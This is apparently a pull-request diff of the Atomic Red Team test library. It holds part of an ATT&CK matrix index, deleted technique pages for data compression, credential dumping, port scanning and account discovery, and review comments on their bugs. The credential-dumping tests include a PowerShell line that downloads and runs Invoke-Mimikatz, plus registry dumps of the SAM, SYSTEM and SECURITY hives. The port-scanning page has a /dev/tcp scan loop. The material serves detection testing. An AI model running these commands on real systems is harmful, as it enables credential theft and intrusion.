| | [Regsvcs/Regasm](./T1121/T1121.md) | [External Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Path Interception](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Exploitation for Defense Evasion](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Password Filter DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Network Connections Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Windows Admin Shares](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | [Remote File Copy](./T1105/T1105.md) |
| | [Regsvr32](./T1117/T1117.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Private Keys](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Owner/User Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | [Standard Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [Rundll32](./T1085/T1085.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Port Monitors](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [File Deletion](./T1107/T1107.md) | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Service Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | [Standard Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Hooking](./T1179/T1179.md) | [Process Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [File System Logical Offsets](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Securityd Memory](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [System Time Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | [Standard Non-Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [Scripting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Hypervisor](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [SID-History Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Gatekeeper Bypass](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Two-Factor Authentication Interception](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | [Uncommonly Used Port](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [Service Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [HISTCONTROL](./T1148/T1148.md) | | | | | | [Web Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) |
| | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Kernel Modules and Extensions](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Hidden Files and Directories](./T1158/T1158.md) | | | | | | |
| | [Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [LC_LOAD_DYLIB Addition](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Setuid and Setgid](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Hidden Users](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | [Source](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [LSASS Driver](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Startup Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Hidden Window](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Launch Agent](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Sudo](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | [Third-party Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Launch Daemon](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Sudo Caching](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Indicator Blocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | [Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Launchctl](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | [Trusted Developer Utilities](./T1127/T1127.md) | [Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Indicator Removal on Host](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | [User Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Login Item](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Indirect Command Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | [Windows Management Instrumentation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Logon Scripts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Install Root Certificate](./T1130/T1130.md) | | | | | | |
| | [Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | [Modify Existing Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [InstallUtil](./T1118/T1118.md) | | | | | | |
| | | [Netsh Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [LC_MAIN Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [New Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Launchctl](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Office Application Startup](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Masquerading](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Path Interception](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Modify Registry](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Mshta](./T1170/T1170.md) | | | | | | |
| | | [Port Knocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [NTFS File Attributes](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Port Monitors](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Network Share Connection Removal](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Rc.common](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Obfuscated Files or Information](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Re-opened Applications](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Redundant Access](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Port Knocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Registry Run Keys / Start Folder](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Process Doppelgänging](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Process Hollowing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Process Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Screensaver](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Redundant Access](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Security Support Provider](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | |
| | | [Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Regsvr32](./T1117/T1117.md) | | | | | | |
| | | [Shortcut Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Rootkit](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Startup Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Rundll32](./T1085/T1085.md) | | | | | | |
| | | [System Firmware](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Time Providers](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Scripting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Software Packing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | [Winlogon Helper DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | [Timestomp](./T1099/T1099.md) | | | | | | |
| | | | | [Trusted Developer Utilities](./T1127/T1127.md) | | | | | | |
| | | | | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
| | | | | [Web Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md) | | | | | | |
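Review bot: every technique that has no atomic yet now links to `https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md`, which bakes the feature-branch name into the generated index; once `uppercase-everything` is merged and the branch deleted, all of those links 404. Generate that link against `master` (or as a relative path, the way the existing entries such as `[Trusted Developer Utilities](./T1127/T1127.md)` are written) so the index survives the merge. Techniques that appear under several tactic columns (`Launchctl`, `Valid Accounts`, `Trap`, `Web Shell`) carry the same placeholder link in each column, so a single change in the generator covers all copies.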
@@ -1,53 +0,0 @@
# T1002 - Data Compressed
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1002)
<blockquote>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.

Detection: Compression software and compressed files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known compression utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used.

If the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)

Platforms: Linux, macOS, Windows

Data Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring

Requires Network: No</blockquote>

## Atomic Tests

- [Atomic Test #1 - Compress Data for Exfiltration With PowerShell](#atomic-test-1---compress-data-for-exfiltration-with-powershell)

- [Atomic Test #2 - Compress Data for Exfiltration With Rar](#atomic-test-2---compress-data-for-exfiltration-with-rar)


<br/>

## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
TODO

**Supported Platforms:** Windows


#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed into our output file | Path | C:\*|
| output_file | Path where resulting compressed data should be placed | Path | C:\test\Data.zip|

#### Run it with `powershell`!
```
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
```
<br/>
<br/>

## Atomic Test #2 - Compress Data for Exfiltration With Rar
TODO

**Supported Platforms:** Windows


#### Run it with `powershell`!
```
rar a -r #{output_file} #{input_file}
```
<br/>
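Review bot: Atomic Test #2 (`rar a -r #{output_file} #{input_file}`) references `#{output_file}` and `#{input_file}` but, unlike Test #1, has no `#### Inputs` table defining them, so those placeholders can never be resolved when the test is executed; both tests also still have `TODO` as their description. The diff shows the file as an outright deletion rather than a rename, so if the uppercase-named replacement differs only in case, make sure it adds an Inputs table for Test #2 (or shares Test #1's) instead of copying these gaps over, and consider a note in CONTRIBUTIONS.md that case-only renames can leave a stale lowercase copy on case-insensitive checkouts.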
@@ -1,210 +0,0 @@
# T1003 - Credential Dumping
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003)
<blockquote>Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.

Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.

===SAM (Security Accounts Manager)===

The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.

A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* gsecdump
* Mimikatz
* secretsdump.py

Alternatively, the SAM can be extracted from the Registry with Reg:
* <code>reg save HKLM\sam sam</code>
* <code>reg save HKLM\system system</code>

Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)

Notes:
Rid 500 account is the local, in-built administrator.
Rid 501 is the guest account.
User accounts start with a RID of 1,000+.

===Cached Credentials===

The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.

A number of tools can be used to retrieve the SAM file through in-memory techniques.
* pwdumpx.exe
* gsecdump
* Mimikatz

Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.

Notes:
Cached credentials for Windows Vista are derived using PBKDF2.

===Local Security Authority (LSA) Secrets===

With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.

When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.

A number of tools can be used to retrieve the SAM file through in-memory techniques.
* pwdumpx.exe
* gsecdump
* Mimikatz
* secretsdump.py

Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.

Notes:
The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.
Windows 10 adds protections for LSA Secrets described in Mitigation.

===NTDS from Domain Controller===

Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)

The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.

* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy

===Group Policy Preference (GPP) Files===

Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.

These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)

The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:

* Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp"
* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py

Notes:
On the SYSVOL share, the following can be used to enumerate potential XML files.
dir /s *.xml

===Service Principle Names (SPNs)===

See Kerberoasting.

===Plaintext Credentials===

After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.

SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.

The following SSPs can be used to access credentials:

Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)
Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)

The following tools can be used to enumerate credentials:

* Windows Credential Editor
* Mimikatz

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:
* <code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can be run:
* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>

===DCSync===

DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in Pass the Ticket (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in Account Manipulation. (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)

Detection: Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective Process Injection to reduce potential indicators of malicious activity.

Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well.

On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.

Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.

Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)

Platforms: Windows

Data Sources: API monitoring, Process command-line parameters, Process monitoring, PowerShell logs

Permissions Required: Administrator, SYSTEM

Contributors: Vincent Le Toux, Ed Williams, Trustwave, SpiderLabs</blockquote>

## Atomic Tests

- [Atomic Test #1 - Powershell Mimikatz](#atomic-test-1---powershell-mimikatz)

- [Atomic Test #2 - Gsecdump](#atomic-test-2---gsecdump)

- [Atomic Test #3 - Windows Credential Editor](#atomic-test-3---windows-credential-editor)

- [Atomic Test #4 - Registry dump of SAM, creds, and secrets](#atomic-test-4---registry-dump-of-sam-creds-and-secrets)


<br/>

## Atomic Test #1 - Powershell Mimikatz
Dumps Credentials via Powershell by invoking a remote mimikatz script

**Supported Platforms:** Windows


#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1|

#### Run it with `powershell`!
```
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
<br/>
<br/>

## Atomic Test #2 - Gsecdump
https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5

**Supported Platforms:** Windows


#### Run it with `command_prompt`!
```
gsecdump -a
```
<br/>
<br/>

## Atomic Test #3 - Windows Credential Editor
http://www.ampliasecurity.com/research/windows-credentials-editor/

**Supported Platforms:** Windows


#### Run it with `command_prompt`!
```
wce -o #{output_file}
```
<br/>
<br/>

## Atomic Test #4 - Registry dump of SAM, creds, and secrets
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7

**Supported Platforms:** Windows


#### Run it with `command_prompt`!
```
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
```
<br/>
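Review bot: Atomic Test #3 runs `wce -o #{output_file}` but the test has no `#### Inputs` table, so `output_file` is never defined (Test #1 is the only test here that declares its input, `remote_script`); the runner cannot substitute the placeholder. The Test #4 description is also split mid-sentence across two source lines ("can be enumerated" / "via three registry keys"), which is harmless in rendered Markdown but suggests the text was pasted rather than written for this file. Since this PR deletes the file, make sure the uppercase-named replacement declares `output_file` (with a default path) for Test #3 and joins that sentence rather than carrying both over.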
@@ -1,35 +0,0 @@
# T1046 - Network Service Scanning
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1046)
<blockquote>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.

Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

Normal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.

Platforms: Linux, macOS, Windows

Data Sources: Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process use of network

Permissions Required: User, Administrator, SYSTEM</blockquote>

## Atomic Tests

- [Atomic Test #1 - Scan a bunch of ports to see if they are open](#atomic-test-1---scan-a-bunch-of-ports-to-see-if-they-are-open)


<br/>

## Atomic Test #1 - Scan a bunch of ports to see if they are open
xxx

**Supported Platforms:** Linux, macOS


#### Run it with `sh`!
```
for port in {1..65535};
do
echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
done
```
<br/>
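Review bot: the executor is declared as `sh`, but the loop depends on two bash-only features: `{1..65535}` brace expansion and the `/dev/tcp/<host>/<port>` pseudo-device. Under a POSIX `sh` (dash on Debian and Ubuntu) the loop runs exactly once with the literal string `{1..65535}` as `$port`, and the redirection fails because `/dev/tcp` does not exist, so the test silently measures nothing. Either declare the executor as `bash` or drive the loop with `seq 1 65535` and a portable connectivity check. The target `192.168.1.1` is hard-coded where every other test in this set uses a declared input, the trailing `:` after `echo "port $port is closed"` is passed to `echo` as a literal argument and just prints a stray colon, and the description is still the `xxx` placeholder. Carry these fixes into the uppercase replacement rather than copying the file as-is.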
@@ -1,123 +0,0 @@
# T1087 - Account Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1087)
<blockquote>Adversaries may attempt to get a listing of local system or domain accounts.

===Windows===

Example commands that can acquire this information are <code>net user</code>, <code>net group <groupname></code>, and <code>net localgroup <groupname></code> using the Net utility or through use of dsquery. If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, System Owner/User Discovery may apply.

===Mac===

On Mac, groups can be enumerated through the <code>groups</code> and <code>id</code> commands. In mac specifically, <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users.

===Linux===

On Linux, local users can be enumerated through the use of the <code>/etc/passwd</code> file which is world readable. In mac, this same file is only used in single-user mode in addition to the <code>/etc/master.passwd</code> file.

Also, groups can be enumerated through the <code>groups</code> and <code>id</code> commands. In mac specifically, <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users.

Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

Platforms: Linux, macOS, Windows

Data Sources: API monitoring, Process command-line parameters, Process monitoring

Permissions Required: User

Contributors: Travis Smith, Tripwire</blockquote>

## Atomic Tests

- [Atomic Test #1 - List all accounts](#atomic-test-1---list-all-accounts)

- [Atomic Test #2 - View sudoers access](#atomic-test-2---view-sudoers-access)

- [Atomic Test #3 - View accounts with UID 0](#atomic-test-3---view-accounts-with-uid-0)

